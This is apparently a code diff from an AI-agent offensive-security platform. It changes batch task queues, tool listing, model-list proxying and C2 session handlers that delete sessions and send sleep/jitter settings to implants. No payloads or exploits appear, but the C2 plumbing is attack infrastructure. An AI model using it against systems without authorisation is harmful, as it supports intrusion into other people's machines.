progressCallback = h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent) progressCallback = h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
taskCtx = mcp.WithMCPConversationID(taskCtx, conversationID) taskCtx = mcp.WithMCPConversationID(taskCtx, conversationID)
taskCtx = mcp.WithToolRunRegistry(taskCtx, h.tasks) taskCtx = mcp.WithToolRunRegistry(taskCtx, h.tasks)
taskCtx = mcp.WithEinoExecuteRunRegistry(taskCtx, h.tasks)
// 使用队列配置的角色工具列表(如果为空,表示使用所有工具) // 使用队列配置的角色工具列表(如果为空,表示使用所有工具)
useBatchMulti := false useBatchMulti := false
@@ -2192,12 +2266,12 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
var runErr error var runErr error
switch { switch {
case useBatchMulti: case useBatchMulti:
resultMA, runErr = multiagent.RunDeepAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, h.agentsMarkdownDir, batchOrch, nil, h.projectBlackboardBlock(conversationID)) resultMA, runErr = multiagent.RunDeepAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.db, h.logger, conversationID, h.conversationProjectID(conversationID), finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, h.agentsMarkdownDir, batchOrch, nil, h.projectBlackboardBlock(conversationID))
default: default:
if h.config == nil { if h.config == nil {
runErr = fmt.Errorf("服务器配置未加载") runErr = fmt.Errorf("服务器配置未加载")
} else { } else {
resultMA, runErr = multiagent.RunEinoSingleChatModelAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, conversationID, finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID)) resultMA, runErr = multiagent.RunEinoSingleChatModelAgent(taskCtx, h.config, &h.config.MultiAgent, h.agent, h.db, h.logger, conversationID, h.conversationProjectID(conversationID), finalMessage, []agent.ChatMessage{}, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID))
} }
} }
@@ -2311,6 +2385,12 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
// 移动到下一个任务 // 移动到下一个任务
h.batchTaskManager.MoveToNextTask(queueID) h.batchTaskManager.MoveToNextTask(queueID)
if h.batchTaskManager.TakeSingleRunTaskIfMatch(queueID, task.ID) {
h.batchTaskManager.UpdateQueueStatus(queueID, "paused")
h.logger.Info("单条执行完成,队列已暂停", zap.String("queueId", queueID), zap.String("taskId", task.ID))
break
}
// 检查是否被取消或暂停 // 检查是否被取消或暂停
queue, _ = h.batchTaskManager.GetBatchQueue(queueID) queue, _ = h.batchTaskManager.GetBatchQueue(queueID)
if queue.Status == "cancelled" || queue.Status == "paused" { if queue.Status == "cancelled" || queue.Status == "paused" {
@@ -3,10 +3,14 @@ package handler
import ( import (
"context" "context"
"fmt" "fmt"
"os"
"path/filepath"
"sync" "sync"
"testing" "testing"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/openai"
"go.uber.org/zap" "go.uber.org/zap"
) )
@@ -46,3 +50,50 @@ func TestCreateProgressCallback_ConcurrentToolEvents(t *testing.T) {
} }
wg.Wait() wg.Wait()
} }
// TestCreateProgressCallback_FlushesReasoningOnDone 流式推理聚合须在 done/response 时落库,刷新后可回放。
func TestCreateProgressCallback_FlushesReasoningOnDone(t *testing.T) {
tmp := t.TempDir()
db, err := database.NewDB(filepath.Join(tmp, "test.sqlite"), zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer os.RemoveAll(tmp)
conv, err := db.CreateConversation("test", database.ConversationCreateMeta{})
if err != nil {
t.Fatalf("CreateConversation: %v", err)
}
asst, err := db.AddMessage(conv.ID, "assistant", "处理中...", nil)
if err != nil {
t.Fatalf("AddMessage: %v", err)
}
h := &AgentHandler{logger: zap.NewNop(), db: db}
cb := h.createProgressCallback(context.Background(), nil, conv.ID, asst.ID, nil)
streamID := "eino-reasoning-test-1"
cb("reasoning_chain_stream_start", " ", map[string]interface{}{
"streamId": streamID,
"source": "eino",
})
cb("reasoning_chain_stream_delta", "step one", openai.WithSSEAccumulated(map[string]interface{}{
"streamId": streamID,
}, "step one"))
cb("done", "", map[string]interface{}{"conversationId": conv.ID})
details, err := db.GetProcessDetails(asst.ID)
if err != nil {
t.Fatalf("GetProcessDetails: %v", err)
}
found := false
for _, d := range details {
if d.EventType == "reasoning_chain" && d.Message == "step one" {
found = true
break
}
}
if !found {
t.Fatalf("expected reasoning_chain persisted on done, got %+v", details)
}
}
+2 -3
View File
@@ -2,7 +2,6 @@ package handler
import ( import (
"strconv" "strconv"
"time"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
@@ -20,12 +19,12 @@ func auditFilterFromQuery(c *gin.Context) database.ListAuditLogsFilter {
ResourceID: c.Query("resource_id"), ResourceID: c.Query("resource_id"),
} }
if since := c.Query("since"); since != "" { if since := c.Query("since"); since != "" {
if t, err := time.Parse(time.RFC3339, since); err == nil { if t, err := database.ParseRFC3339Time(since); err == nil {
filter.Since = &t filter.Since = &t
} }
} }
if until := c.Query("until"); until != "" { if until := c.Query("until"); until != "" {
if t, err := time.Parse(time.RFC3339, until); err == nil { if t, err := database.ParseRFC3339Time(until); err == nil {
filter.Until = &t filter.Until = &t
} }
} }
+161 -8
View File
@@ -77,11 +77,12 @@ type BatchTaskQueue struct {
// BatchTaskManager 批量任务管理器 // BatchTaskManager 批量任务管理器
type BatchTaskManager struct { type BatchTaskManager struct {
db *database.DB db *database.DB
logger *zap.Logger logger *zap.Logger
queues map[string]*BatchTaskQueue queues map[string]*BatchTaskQueue
taskCancels map[string]context.CancelFunc // 存储每个队列当前任务的取消函数 taskCancels map[string]context.CancelFunc // 存储每个队列当前任务的取消函数
mu sync.RWMutex singleRunTasks map[string]string // queueID -> taskID,单条执行完成后暂停队列
mu sync.RWMutex
} }
// NewBatchTaskManager 创建批量任务管理器 // NewBatchTaskManager 创建批量任务管理器
@@ -90,9 +91,10 @@ func NewBatchTaskManager(logger *zap.Logger) *BatchTaskManager {
logger = zap.NewNop() logger = zap.NewNop()
} }
return &BatchTaskManager{ return &BatchTaskManager{
logger: logger, logger: logger,
queues: make(map[string]*BatchTaskQueue), queues: make(map[string]*BatchTaskQueue),
taskCancels: make(map[string]context.CancelFunc), taskCancels: make(map[string]context.CancelFunc),
singleRunTasks: make(map[string]string),
} }
} }
@@ -864,6 +866,138 @@ func (m *BatchTaskManager) AddTaskToQueue(queueID, message string) (*BatchTask,
return task, nil return task, nil
} }
// PrepareSingleTaskRun 准备单条执行:重置目标任务(若已有结果)并定位队列索引
func (m *BatchTaskManager) PrepareSingleTaskRun(queueID, taskID string) error {
var cancelFunc context.CancelFunc
var siblingRunningIDs []string
m.mu.Lock()
queue, exists := m.queues[queueID]
if !exists {
m.mu.Unlock()
return fmt.Errorf("队列不存在")
}
var task *BatchTask
taskIndex := -1
for i, t := range queue.Tasks {
if t.ID == taskID {
taskIndex = i
task = t
break
}
}
if task == nil {
m.mu.Unlock()
return fmt.Errorf("任务不存在")
}
if !queueAllowsSingleTaskRunLocked(queue, task) {
m.mu.Unlock()
return fmt.Errorf("队列正在执行或未就绪,无法单条执行")
}
// 暂停态:中止在途子任务并收口仍标记 running 的其它子任务,以便单条执行非冲突项
if queue.Status == BatchQueueStatusPaused {
if c, ok := m.taskCancels[queueID]; ok {
cancelFunc = c
delete(m.taskCancels, queueID)
}
for _, t := range queue.Tasks {
if t != nil && t.ID != taskID && t.Status == BatchTaskStatusRunning {
siblingRunningIDs = append(siblingRunningIDs, t.ID)
}
}
}
needsReset := task.Status != BatchTaskStatusPending
resumeQueue := queue.Status == BatchQueueStatusCompleted || queue.Status == BatchQueueStatusCancelled
m.mu.Unlock()
if cancelFunc != nil {
cancelFunc()
}
const staleRunMsg = "为单条执行其它任务,已中止"
for _, sid := range siblingRunningIDs {
m.UpdateTaskStatus(queueID, sid, BatchTaskStatusCancelled, "", staleRunMsg)
}
m.mu.Lock()
defer m.mu.Unlock()
queue, exists = m.queues[queueID]
if !exists {
return fmt.Errorf("队列不存在")
}
task = nil
taskIndex = -1
for i, t := range queue.Tasks {
if t.ID == taskID {
taskIndex = i
task = t
break
}
}
if task == nil {
return fmt.Errorf("任务不存在")
}
if m.db != nil {
if err := m.db.PrepareBatchSingleTaskRun(queueID, taskID, taskIndex, needsReset, resumeQueue); err != nil {
return fmt.Errorf("准备单条执行失败: %w", err)
}
}
if needsReset {
task.Status = BatchTaskStatusPending
task.ConversationID = ""
task.StartedAt = nil
task.CompletedAt = nil
task.Error = ""
task.Result = ""
}
queue.CurrentIndex = taskIndex
queue.LastRunError = ""
if resumeQueue {
queue.Status = BatchQueueStatusPaused
queue.CompletedAt = nil
}
return nil
}
// SetSingleRunTask 标记队列仅执行指定子任务,完成后自动暂停
func (m *BatchTaskManager) SetSingleRunTask(queueID, taskID string) {
m.mu.Lock()
defer m.mu.Unlock()
if m.singleRunTasks == nil {
m.singleRunTasks = make(map[string]string)
}
m.singleRunTasks[queueID] = taskID
}
// ClearSingleRunTask 清除单条执行标记
func (m *BatchTaskManager) ClearSingleRunTask(queueID string) {
m.mu.Lock()
defer m.mu.Unlock()
delete(m.singleRunTasks, queueID)
}
// TakeSingleRunTaskIfMatch 若刚完成的子任务为单条执行目标,则清除标记并返回 true
func (m *BatchTaskManager) TakeSingleRunTaskIfMatch(queueID, taskID string) bool {
m.mu.Lock()
defer m.mu.Unlock()
if m.singleRunTasks == nil {
return false
}
if m.singleRunTasks[queueID] != taskID {
return false
}
delete(m.singleRunTasks, queueID)
return true
}
// DeleteTask 删除任务(队列空闲时可删;执行中任务不可删) // DeleteTask 删除任务(队列空闲时可删;执行中任务不可删)
func (m *BatchTaskManager) DeleteTask(queueID, taskID string) error { func (m *BatchTaskManager) DeleteTask(queueID, taskID string) error {
m.mu.Lock() m.mu.Lock()
@@ -936,6 +1070,25 @@ func queueAllowsTaskListMutationLocked(queue *BatchTaskQueue) bool {
} }
} }
// queueAllowsSingleTaskRunLocked 是否允许对指定子任务发起单条执行(必须在持有 BatchTaskManager.mu 下调用)
func queueAllowsSingleTaskRunLocked(queue *BatchTaskQueue, task *BatchTask) bool {
if queue == nil || task == nil {
return false
}
if task.Status == BatchTaskStatusRunning {
return false
}
if queue.Status == BatchQueueStatusRunning {
return false
}
switch queue.Status {
case BatchQueueStatusPending, BatchQueueStatusPaused, BatchQueueStatusCompleted, BatchQueueStatusCancelled:
return true
default:
return false
}
}
// GetNextTask 获取下一个待执行的任务 // GetNextTask 获取下一个待执行的任务
func (m *BatchTaskManager) GetNextTask(queueID string) (*BatchTask, bool) { func (m *BatchTaskManager) GetNextTask(queueID string) (*BatchTask, bool) {
m.mu.Lock() m.mu.Lock()
+58 -3
View File
@@ -1,6 +1,7 @@
package handler package handler
import ( import (
"database/sql"
"encoding/json" "encoding/json"
"errors" "errors"
"fmt" "fmt"
@@ -277,6 +278,9 @@ func (h *C2Handler) ListSessions(c *gin.Context) {
filter.Limit = n filter.Limit = n
} }
} }
if c.Query("suspicious") == "1" || strings.EqualFold(c.Query("suspicious"), "true") {
filter.Suspicious = true
}
sessions, err := h.mgr().DB().ListC2Sessions(filter) sessions, err := h.mgr().DB().ListC2Sessions(filter)
if err != nil { if err != nil {
@@ -324,7 +328,37 @@ func (h *C2Handler) DeleteSession(c *gin.Context) {
c.JSON(http.StatusOK, gin.H{"deleted": true}) c.JSON(http.StatusOK, gin.H{"deleted": true})
} }
// SetSessionSleep 设置会话的 sleep/jitter // DeleteSessions 批量删除会话(请求体 JSON: {"ids":["s_xxx",...]}
func (h *C2Handler) DeleteSessions(c *gin.Context) {
var req struct {
IDs []string `json:"ids"`
}
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid json: " + err.Error()})
return
}
if len(req.IDs) == 0 {
c.JSON(http.StatusBadRequest, gin.H{"error": "ids is required"})
return
}
n, err := h.mgr().DB().DeleteC2SessionsByIDs(req.IDs)
if err != nil {
if errors.Is(err, database.ErrNoValidC2SessionIDs) {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
if h.audit != nil {
h.audit.RecordOK(c, "c2", "session_delete", "批量删除 C2 会话", "c2_session", "", map[string]interface{}{
"count": n, "ids": req.IDs,
})
}
c.JSON(http.StatusOK, gin.H{"deleted": n})
}
// SetSessionSleep 设置会话的 sleep/jitter,并下发 sleep 任务到植入体
func (h *C2Handler) SetSessionSleep(c *gin.Context) { func (h *C2Handler) SetSessionSleep(c *gin.Context) {
id := c.Param("id") id := c.Param("id")
var req struct { var req struct {
@@ -335,12 +369,33 @@ func (h *C2Handler) SetSessionSleep(c *gin.Context) {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return return
} }
if req.SleepSeconds < 1 {
c.JSON(http.StatusBadRequest, gin.H{"error": "sleep_seconds must be >= 1"})
return
}
if req.JitterPercent < 0 || req.JitterPercent > 100 {
c.JSON(http.StatusBadRequest, gin.H{"error": "jitter_percent must be 0-100"})
return
}
if err := h.mgr().DB().SetC2SessionSleep(id, req.SleepSeconds, req.JitterPercent); err != nil { task, err := h.mgr().SetSessionSleep(id, req.SleepSeconds, req.JitterPercent)
if err != nil {
if errors.Is(err, sql.ErrNoRows) {
c.JSON(http.StatusNotFound, gin.H{"error": "session not found"})
return
}
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return return
} }
c.JSON(http.StatusOK, gin.H{"updated": true}) out := gin.H{
"updated": true,
"sleep_seconds": req.SleepSeconds,
"jitter_percent": req.JitterPercent,
}
if task != nil {
out["task_id"] = task.ID
}
c.JSON(http.StatusOK, out)
} }
// ============================================================================ // ============================================================================
+182 -71
View File
@@ -298,7 +298,7 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
} }
} }
// 获取外部MCP工具 // 获取外部MCP工具(走缓存,持锁期间通常不阻塞)
if h.externalMCPMgr != nil { if h.externalMCPMgr != nil {
ctx := context.Background() ctx := context.Background()
externalTools := h.getExternalMCPTools(ctx) externalTools := h.getExternalMCPTools(ctx)
@@ -359,9 +359,6 @@ type GetToolsResponse struct {
// GetTools 获取工具列表(支持分页和搜索) // GetTools 获取工具列表(支持分页和搜索)
func (h *ConfigHandler) GetTools(c *gin.Context) { func (h *ConfigHandler) GetTools(c *gin.Context) {
h.mu.RLock()
defer h.mu.RUnlock()
c.Header("Cache-Control", "no-store, no-cache, must-revalidate") c.Header("Cache-Control", "no-store, no-cache, must-revalidate")
// 解析分页参数 // 解析分页参数
@@ -407,12 +404,37 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
} }
} }
includeExternal := true
if v := strings.TrimSpace(strings.ToLower(c.Query("include_external"))); v == "0" || v == "false" || v == "no" {
includeExternal = false
}
refreshExternal := false
if v := strings.TrimSpace(strings.ToLower(c.Query("refresh_external"))); v == "1" || v == "true" || v == "yes" {
refreshExternal = true
}
// 按外部 MCP 名称筛选(MCP 管理页左侧卡片 → 右侧工具列表联动)
externalMCPFilter := strings.TrimSpace(c.Query("external_mcp"))
// 快照配置后立即释放锁,避免外部 MCP 网络 IO 阻塞整个配置子系统
h.mu.RLock()
securityTools := append([]config.ToolConfig(nil), h.config.Security.Tools...)
roles := h.config.Roles
toolDescriptionMode := h.config.Security.ToolDescriptionMode
mcpServer := h.mcpServer
externalMCPMgr := h.externalMCPMgr
h.mu.RUnlock()
pickDesc := func(shortDesc, fullDesc string) string {
return pickToolDescriptionWithMode(toolDescriptionMode, shortDesc, fullDesc)
}
// 解析角色参数,用于过滤工具并标注启用状态 // 解析角色参数,用于过滤工具并标注启用状态
roleName := c.Query("role") roleName := c.Query("role")
var roleToolsSet map[string]bool // 角色配置的工具集合 var roleToolsSet map[string]bool // 角色配置的工具集合
var roleUsesAllTools bool = true // 角色是否使用所有工具(默认角色) var roleUsesAllTools bool = true // 角色是否使用所有工具(默认角色)
if roleName != "" && roleName != "默认" && h.config.Roles != nil { if roleName != "" && roleName != "默认" && roles != nil {
if role, exists := h.config.Roles[roleName]; exists && role.Enabled { if role, exists := roles[roleName]; exists && role.Enabled {
if len(role.Tools) > 0 { if len(role.Tools) > 0 {
// 角色配置了工具列表,只使用这些工具 // 角色配置了工具列表,只使用这些工具
roleToolsSet = make(map[string]bool) roleToolsSet = make(map[string]bool)
@@ -426,12 +448,12 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
// 获取所有内部工具并应用搜索过滤 // 获取所有内部工具并应用搜索过滤
configToolMap := make(map[string]bool) configToolMap := make(map[string]bool)
allTools := make([]ToolConfigInfo, 0, len(h.config.Security.Tools)) allTools := make([]ToolConfigInfo, 0, len(securityTools))
for _, tool := range h.config.Security.Tools { for _, tool := range securityTools {
configToolMap[tool.Name] = true configToolMap[tool.Name] = true
toolInfo := ToolConfigInfo{ toolInfo := ToolConfigInfo{
Name: tool.Name, Name: tool.Name,
Description: h.pickToolDescription(tool.ShortDescription, tool.Description), Description: pickDesc(tool.ShortDescription, tool.Description),
Enabled: tool.Enabled, Enabled: tool.Enabled,
IsExternal: false, IsExternal: false,
} }
@@ -479,15 +501,15 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
} }
// 从MCP服务器获取所有已注册的工具(包括直接注册的工具,如知识检索工具) // 从MCP服务器获取所有已注册的工具(包括直接注册的工具,如知识检索工具)
if h.mcpServer != nil { if mcpServer != nil {
mcpTools := h.mcpServer.GetAllTools() mcpTools := mcpServer.GetAllTools()
for _, mcpTool := range mcpTools { for _, mcpTool := range mcpTools {
// 跳过已经在配置文件中的工具(避免重复) // 跳过已经在配置文件中的工具(避免重复)
if configToolMap[mcpTool.Name] { if configToolMap[mcpTool.Name] {
continue continue
} }
description := h.pickToolDescription(mcpTool.ShortDescription, mcpTool.Description) description := pickDesc(mcpTool.ShortDescription, mcpTool.Description)
toolInfo := ToolConfigInfo{ toolInfo := ToolConfigInfo{
Name: mcpTool.Name, Name: mcpTool.Name,
@@ -534,11 +556,13 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
} }
} }
// 获取外部MCP工具 // 获取外部MCP工具(可走缓存,不持有 config 锁)
if h.externalMCPMgr != nil { if includeExternal && externalMCPMgr != nil {
// 创建context用于获取外部工具 if refreshExternal {
externalMCPMgr.InvalidateAllToolCaches()
}
ctx := context.Background() ctx := context.Background()
externalTools := h.getExternalMCPTools(ctx) externalTools := h.getExternalMCPToolsWithManager(ctx, externalMCPMgr, pickDesc)
// 应用搜索过滤和角色配置 // 应用搜索过滤和角色配置
for _, toolInfo := range externalTools { for _, toolInfo := range externalTools {
@@ -585,6 +609,16 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
// 注意:这里我们不直接过滤掉工具,而是保留所有工具,但通过 role_enabled 字段标注状态 // 注意:这里我们不直接过滤掉工具,而是保留所有工具,但通过 role_enabled 字段标注状态
// 这样前端可以显示所有工具,并标注哪些工具在当前角色中可用 // 这样前端可以显示所有工具,并标注哪些工具在当前角色中可用
if externalMCPFilter != "" {
filtered := make([]ToolConfigInfo, 0)
for _, tool := range allTools {
if tool.IsExternal && tool.ExternalMCP == externalMCPFilter {
filtered = append(filtered, tool)
}
}
allTools = filtered
}
// 统一按名称排序后再分页,避免配置文件中顺序导致「全部」与「仅已启用」前几页看起来完全一致 // 统一按名称排序后再分页,避免配置文件中顺序导致「全部」与「仅已启用」前几页看起来完全一致
sort.SliceStable(allTools, func(i, j int) bool { sort.SliceStable(allTools, func(i, j int) bool {
key := func(t ToolConfigInfo) string { key := func(t ToolConfigInfo) string {
@@ -654,11 +688,9 @@ type UpdateConfigRequest struct {
// AgentConfigUpdate 用于 PATCH /api/config 的 agent 段:仅 JSON 中出现的字段(指针非 nil)覆盖内存配置。 // AgentConfigUpdate 用于 PATCH /api/config 的 agent 段:仅 JSON 中出现的字段(指针非 nil)覆盖内存配置。
// 避免旧版「整包替换 *AgentConfig」时,未传的整型字段被反序列化为 0 误覆盖(例如 tool_timeout_minutes 变成 0)。 // 避免旧版「整包替换 *AgentConfig」时,未传的整型字段被反序列化为 0 误覆盖(例如 tool_timeout_minutes 变成 0)。
type AgentConfigUpdate struct { type AgentConfigUpdate struct {
MaxIterations *int `json:"max_iterations,omitempty"` MaxIterations *int `json:"max_iterations,omitempty"`
LargeResultThreshold *int `json:"large_result_threshold,omitempty"` ToolTimeoutMinutes *int `json:"tool_timeout_minutes,omitempty"`
ResultStorageDir *string `json:"result_storage_dir,omitempty"` SystemPromptPath *string `json:"system_prompt_path,omitempty"`
ToolTimeoutMinutes *int `json:"tool_timeout_minutes,omitempty"`
SystemPromptPath *string `json:"system_prompt_path,omitempty"`
} }
func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) { func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) {
@@ -668,12 +700,6 @@ func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) {
if src.MaxIterations != nil { if src.MaxIterations != nil {
dst.MaxIterations = *src.MaxIterations dst.MaxIterations = *src.MaxIterations
} }
if src.LargeResultThreshold != nil {
dst.LargeResultThreshold = *src.LargeResultThreshold
}
if src.ResultStorageDir != nil {
dst.ResultStorageDir = *src.ResultStorageDir
}
if src.ToolTimeoutMinutes != nil { if src.ToolTimeoutMinutes != nil {
dst.ToolTimeoutMinutes = *src.ToolTimeoutMinutes dst.ToolTimeoutMinutes = *src.ToolTimeoutMinutes
} }
@@ -1042,6 +1068,80 @@ func (h *ConfigHandler) TestOpenAI(c *gin.Context) {
}) })
} }
// ListModelsRequest 获取模型列表请求(OpenAI 兼容 GET /models)。
type ListModelsRequest struct {
Provider string `json:"provider"`
BaseURL string `json:"base_url"`
APIKey string `json:"api_key"`
}
// ListModels 代理调用上游 GET /models,返回可用模型 id 列表。
func (h *ConfigHandler) ListModels(c *gin.Context) {
var req ListModelsRequest
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
return
}
provider := strings.TrimSpace(req.Provider)
if provider == "" {
provider = "openai"
}
if strings.EqualFold(provider, "claude") {
c.JSON(http.StatusOK, gin.H{
"success": false,
"supported": false,
"error": "Claude (Anthropic Messages API) 不支持自动获取模型列表,请手动填写",
})
return
}
if strings.TrimSpace(req.APIKey) == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "API Key 不能为空"})
return
}
baseURL := strings.TrimSuffix(strings.TrimSpace(req.BaseURL), "/")
if baseURL == "" {
baseURL = "https://api.openai.com/v1"
}
tmpCfg := &config.OpenAIConfig{
Provider: provider,
BaseURL: baseURL,
APIKey: strings.TrimSpace(req.APIKey),
}
client := openai.NewClient(tmpCfg, nil, h.logger)
ctx, cancel := context.WithTimeout(c.Request.Context(), 30*time.Second)
defer cancel()
models, err := client.ListModels(ctx)
if err != nil {
if apiErr, ok := err.(*openai.APIError); ok {
c.JSON(http.StatusOK, gin.H{
"success": false,
"supported": true,
"error": fmt.Sprintf("API 返回错误 (HTTP %d): %s", apiErr.StatusCode, apiErr.Body),
})
return
}
c.JSON(http.StatusOK, gin.H{
"success": false,
"supported": true,
"error": err.Error(),
})
return
}
c.JSON(http.StatusOK, gin.H{
"success": true,
"supported": true,
"models": models,
"count": len(models),
})
}
// TestVisionRequest 测试 Vision 模型连接;vision.api_key/base_url 留空时可传 openai 段作回退。 // TestVisionRequest 测试 Vision 模型连接;vision.api_key/base_url 留空时可传 openai 段作回退。
type TestVisionRequest struct { type TestVisionRequest struct {
Vision config.VisionConfig `json:"vision"` Vision config.VisionConfig `json:"vision"`
@@ -1498,8 +1598,6 @@ func updateAgentConfig(doc *yaml.Node, agent config.AgentConfig) {
agentNode := ensureMap(root, "agent") agentNode := ensureMap(root, "agent")
setIntInMap(agentNode, "max_iterations", agent.MaxIterations) setIntInMap(agentNode, "max_iterations", agent.MaxIterations)
setIntInMap(agentNode, "tool_timeout_minutes", agent.ToolTimeoutMinutes) setIntInMap(agentNode, "tool_timeout_minutes", agent.ToolTimeoutMinutes)
setIntInMap(agentNode, "large_result_threshold", agent.LargeResultThreshold)
setStringInMap(agentNode, "result_storage_dir", agent.ResultStorageDir)
setStringInMap(agentNode, "system_prompt_path", agent.SystemPromptPath) setStringInMap(agentNode, "system_prompt_path", agent.SystemPromptPath)
} }
@@ -1906,50 +2004,52 @@ func setFloatInMap(mapNode *yaml.Node, key string, value float64) {
} }
// getExternalMCPTools 获取外部MCP工具列表(公共方法) // getExternalMCPTools 获取外部MCP工具列表(公共方法)
// 返回 ToolConfigInfo 列表,已处理启用状态和描述信息
func (h *ConfigHandler) getExternalMCPTools(ctx context.Context) []ToolConfigInfo { func (h *ConfigHandler) getExternalMCPTools(ctx context.Context) []ToolConfigInfo {
var result []ToolConfigInfo
if h.externalMCPMgr == nil { if h.externalMCPMgr == nil {
return nil
}
return h.getExternalMCPToolsWithManager(ctx, h.externalMCPMgr, h.pickToolDescription)
}
// getExternalMCPToolsWithManager 获取外部 MCP 工具(不持有 config 锁,供 GetTools 等热路径使用)
func (h *ConfigHandler) getExternalMCPToolsWithManager(
ctx context.Context,
mgr *mcp.ExternalMCPManager,
pickDesc func(shortDesc, fullDesc string) string,
) []ToolConfigInfo {
var result []ToolConfigInfo
if mgr == nil {
return result return result
} }
// 使用较短的超时时间(5秒)进行快速失败,避免阻塞页面加载
timeoutCtx, cancel := context.WithTimeout(ctx, 5*time.Second) timeoutCtx, cancel := context.WithTimeout(ctx, 5*time.Second)
defer cancel() defer cancel()
externalTools, err := h.externalMCPMgr.GetAllTools(timeoutCtx) externalTools, err := mgr.GetAllTools(timeoutCtx)
if err != nil { if err != nil {
// 记录警告但不阻塞,继续返回已缓存的工具(如果有)
h.logger.Warn("获取外部MCP工具失败(可能连接断开),尝试返回缓存的工具", h.logger.Warn("获取外部MCP工具失败(可能连接断开),尝试返回缓存的工具",
zap.Error(err), zap.Error(err),
zap.String("hint", "如果外部MCP工具未显示,请检查连接状态或点击刷新按钮"), zap.String("hint", "如果外部MCP工具未显示,请检查连接状态或点击刷新按钮"),
) )
} }
// 如果获取到了工具(即使有错误),继续处理
if len(externalTools) == 0 { if len(externalTools) == 0 {
return result return result
} }
externalMCPConfigs := h.externalMCPMgr.GetConfigs() externalMCPConfigs := mgr.GetConfigs()
for _, externalTool := range externalTools { for _, externalTool := range externalTools {
// 解析工具名称:mcpName::toolName
mcpName, actualToolName := h.parseExternalToolName(externalTool.Name) mcpName, actualToolName := h.parseExternalToolName(externalTool.Name)
if mcpName == "" || actualToolName == "" { if mcpName == "" || actualToolName == "" {
continue // 跳过格式不正确的工具 continue
} }
// 计算启用状态 enabled := h.calculateExternalToolEnabledWithManager(mcpName, actualToolName, externalMCPConfigs, mgr)
enabled := h.calculateExternalToolEnabled(mcpName, actualToolName, externalMCPConfigs)
// 处理描述信息
description := h.pickToolDescription(externalTool.ShortDescription, externalTool.Description)
result = append(result, ToolConfigInfo{ result = append(result, ToolConfigInfo{
Name: actualToolName, Name: actualToolName,
Description: description, Description: pickDesc(externalTool.ShortDescription, externalTool.Description),
Enabled: enabled, Enabled: enabled,
IsExternal: true, IsExternal: true,
ExternalMCP: mcpName, ExternalMCP: mcpName,
@@ -1970,40 +2070,48 @@ func (h *ConfigHandler) parseExternalToolName(fullName string) (mcpName, toolNam
// calculateExternalToolEnabled 计算外部工具的启用状态 // calculateExternalToolEnabled 计算外部工具的启用状态
func (h *ConfigHandler) calculateExternalToolEnabled(mcpName, toolName string, configs map[string]config.ExternalMCPServerConfig) bool { func (h *ConfigHandler) calculateExternalToolEnabled(mcpName, toolName string, configs map[string]config.ExternalMCPServerConfig) bool {
return h.calculateExternalToolEnabledWithManager(mcpName, toolName, configs, h.externalMCPMgr)
}
func (h *ConfigHandler) calculateExternalToolEnabledWithManager(
mcpName, toolName string,
configs map[string]config.ExternalMCPServerConfig,
mgr *mcp.ExternalMCPManager,
) bool {
cfg, exists := configs[mcpName] cfg, exists := configs[mcpName]
if !exists { if !exists {
return false return false
} }
// 首先检查外部MCP是否启用
if !cfg.ExternalMCPEnable { if !cfg.ExternalMCPEnable {
return false // MCP未启用,所有工具都禁用 return false
} }
// MCP已启用,检查单个工具的启用状态 if cfg.ToolEnabled != nil {
// 如果ToolEnabled为空或未设置该工具,默认为启用(向后兼容) if toolEnabled, exists := cfg.ToolEnabled[toolName]; exists && !toolEnabled {
if cfg.ToolEnabled == nil {
// 未设置工具状态,默认为启用
} else if toolEnabled, exists := cfg.ToolEnabled[toolName]; exists {
// 使用配置的工具状态
if !toolEnabled {
return false return false
} }
} }
// 工具未在配置中,默认为启用
// 最后检查外部MCP是否已连接 if mgr == nil {
client, exists := h.externalMCPMgr.GetClient(mcpName) return false
}
client, exists := mgr.GetClient(mcpName)
if !exists || !client.IsConnected() { if !exists || !client.IsConnected() {
return false // 未连接时视为禁用 return false
} }
return true return true
} }
// pickToolDescription 根据 security.tool_description_mode 选择 short 或 full 描述并限制长度 // pickToolDescription 根据 security.tool_description_mode 选择 short 或 full 描述并限制长度
// 调用方若已持有 h.mu 读锁,须直接读 mode 并调用 pickToolDescriptionWithMode,避免嵌套 RLock 死锁。
func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string { func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string {
